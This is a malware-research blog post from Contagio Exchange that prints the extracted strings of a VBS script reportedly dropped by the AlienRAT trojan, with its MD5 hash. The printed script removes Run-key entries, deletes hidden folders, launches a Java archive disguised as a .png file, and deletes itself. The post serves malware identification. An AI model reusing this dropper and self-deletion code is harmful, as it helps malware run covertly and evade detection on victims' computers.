About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become s useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Monday, November 17, 2014

OiuFr7LcfXq1847924646026958055.vbs - AlienRAT dropped VBS

Note: Laura is the user name on the sandbox


File: OiuFr7LcfXq1847924646026958055.vbs
MD5:  9e1ede0dedadb7af34c0222ada2d58c9
Size: 1542



Ascii Strings:
---------------------------------------------------------------------------
on error resume next
Wscript.sleep 5000
Dim oShell
Dim sFunction
Set oShell = WScript.CreateObject ("WSCript.shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
oShell.regdelete("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GKXeW0Yke7")
oShell.regdelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\GKXeW0Yke7")
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd""",0
objFSO.DeleteFile("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd"),TRUE
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f""",0
Wscript.sleep 5000
objFSO.DeleteFile("C:\Documents and Settings\Laura\.m4w6OAI02f\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\.m4w6OAI02f"),TRUE
oShell.run """C:\Program Files\Java\jre7\bin\javaw.exe"" -jar ""C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png"""
Wscript.sleep 3000
objFSO.DeleteFile("C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png\*"),TRUE
Set oShell = Nothing
Set objFSO = Nothing
sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & WScript.ScriptFullName & Chr(34)
Execute(sFunction)

Unicode Strings:
---------------------------------------------------------------------------